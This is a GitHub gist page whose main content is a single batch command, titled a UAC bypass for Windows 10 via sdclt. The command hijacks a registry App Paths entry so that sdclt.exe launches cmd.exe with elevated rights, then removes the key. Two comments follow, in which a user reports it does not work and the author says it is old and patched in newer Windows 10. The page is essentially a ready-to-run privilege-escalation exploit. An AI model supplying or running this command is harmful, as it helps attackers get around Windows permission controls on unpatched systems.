Skip to content

Instantly share code, notes, and snippets.

@netbiosX
Created June 9, 2017 07:06
Show Gist options
  • Save netbiosX/bb566a9c7444c375b5bbac07576072b1 to your computer and use it in GitHub Desktop.
Save netbiosX/bb566a9c7444c375b5bbac07576072b1 to your computer and use it in GitHub Desktop.
UAC Bypass in Windows 10 via sdclt - batch version
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
@agamsol
Copy link

agamsol commented Jan 16, 2022

I don't understand how this works. but It does not give me administrator

@netbiosX
Copy link
Author

This is an old bypass and no longer works in newest Windows 10 versions.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment